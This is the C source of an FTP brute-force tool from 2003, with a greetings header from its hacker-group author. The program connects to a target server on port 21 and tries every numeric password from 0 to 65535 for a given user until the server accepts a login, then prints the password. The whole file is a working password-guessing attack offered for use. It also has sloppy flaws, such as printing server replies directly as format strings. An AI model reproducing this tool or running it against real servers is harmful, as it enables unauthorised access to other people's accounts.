/*
ftp-bf.c an easy FTP Brute Force beta 1.0
(c) 2003 by Oliver "Taktloss" Herms
This is a very earlie version of ftp-bf, it can only crack pw's from 0 to 65535 (int), the next version will include chars...
So don't send me emails that the prog dosen't crack some pw's ;) I know that and I am working on it =)

www: www.excluded.org
email: Takt@excluded.org
icq: #141665405

greetz:
-Excluded-Team			         	"Seit alle voll ok ;)"
-l0om			            			"thx. 4 help beim coden"
-Chirs "Er@$er" Ingenpass 			"Leg dich mit dem besten an und du stirbst wie alle dann ;)"
-Steffen "Neodeus" Görtz 			"Du stinkst!"
-Gladiac der sich SubSeven installiert hat 	"lol"
-Sharpi						         "Du hast gelbe krumme Zähne! *joke*"
*/


#include <stdio.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <string.h>


int main(int argc, char **argv)
{
char *destip;
char *login;
if(argc != 3)
{
    printf("usage: %s [dest-ip] [user]\n", argv[0]);
    exit(-1);
}

destip = argv[1];
login = argv[2];
printf("*************************\n");
printf("***  FTP Brute Force  ***\n");
printf("***(c)2003 by Taktloss***\n");
printf("***  www.excluded.org ***\n");
printf("*************************\n");
/* Schleichwerbung?! */

/* brutefoce(char *ip, char *login); */
bruteforce(destip, login);
return 0;
}

int bruteforce(char *ip, char *login)
{
char cmdpass[6] = "PASS";
char cmduser[6] = "USER";
char cmdpass2[255];
char cmduser2[255];
int connection;
int sockfd;
int bedingung = 0;
int pw = 0;
char buffer[1024];

snprintf(cmduser2, sizeof(cmduser2), "%s %s\r\n", cmduser, login); /* USER <user> */



/* the routine */
while(bedingung==0)
{

	/* connection */
        struct sockaddr_in servaddr;
	sockfd = socket(AF_INET, SOCK_STREAM, 0);

	if(sockfd < 0)
	{
	printf("Socket could not be created!\n");
	}
	else
	{
	printf("Socket creation success!\n");
	}
	/* the structure */
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = inet_addr(ip);
	servaddr.sin_port = htons(21);

        connection = connect(sockfd, (struct sockaddr_in *)&servaddr, sizeof(servaddr));

	/* steht die connection !? */
	if(connection == -1)
	{
	printf("connection refused!\n");
	}
	else
	{
	printf("connected!\n");
	}



	/* login banner */
	if(bedingung != 0)
	{
	memset(buffer, 0x00, sizeof(buffer)); /* buffer leeren für neue füllung */
	}
        alarm(0.5);
        read(sockfd, buffer, sizeof(buffer));
	printf(buffer);

	memset(buffer, 0x00, sizeof(buffer)); /* leere buffer für neue füllung */


	/* sending USER <user> */
	printf("Sending cmd: ");
	printf(cmduser2);
	printf("\n");
	if(write(sockfd, cmduser2, strlen(cmduser2)) !=  strlen(cmduser2))
	{
	printf("write faild...\n");
	}
	printf("...done\n");
        alarm(0.5);
        read(sockfd, buffer, sizeof(buffer));
        printf(buffer);

        memset(buffer, 0x00, sizeof(buffer)); /* buffer leeren für neu füllung */


	/* sending PASS <pw> */
	snprintf(cmdpass2, sizeof(cmdpass2), "%s %d\r\n", cmdpass, pw);
	printf("Sending cmd: ");
	printf(cmdpass2);
	printf("\n");
        if(write(sockfd, cmdpass2, strlen(cmdpass2)) != strlen(cmdpass2))
	{
	printf("write faild...\n");
	}
	printf("...done\n");
        alarm(0.5);
        read(sockfd, buffer, sizeof(buffer));
	printf(buffer);

	close(sockfd);

	/* check if banner begins with 230 */
	if(strncmp(buffer, "230", 3) == 0)
	{
	printf("PW: ");
	printf("%i", pw);
	printf("\n");

	bedingung = 1;
	}

	/* overflow in pw? */
	if(pw == 65535)
	{
	printf("The large of an integer has been reached...\n");
	break;
	}


	/* pw + 1 */
	pw++;
}
return 0;
}